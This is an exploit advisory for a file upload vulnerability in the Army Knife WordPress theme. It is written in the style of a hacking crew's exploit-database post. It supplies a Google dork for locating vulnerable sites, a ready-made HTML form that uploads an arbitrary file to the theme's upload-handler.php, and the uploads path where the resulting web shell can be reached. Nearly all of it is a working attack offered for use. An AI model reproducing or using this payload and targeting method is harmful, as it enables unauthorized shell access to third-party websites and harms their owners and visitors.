Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co
Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on : Windows/Linux
Exploit & POC :
<form enctype="multipart/form-data" action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post"> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form>
File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php
./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo
JKT48 CYBER TEAM & Black Devils Crew
Leave a Reply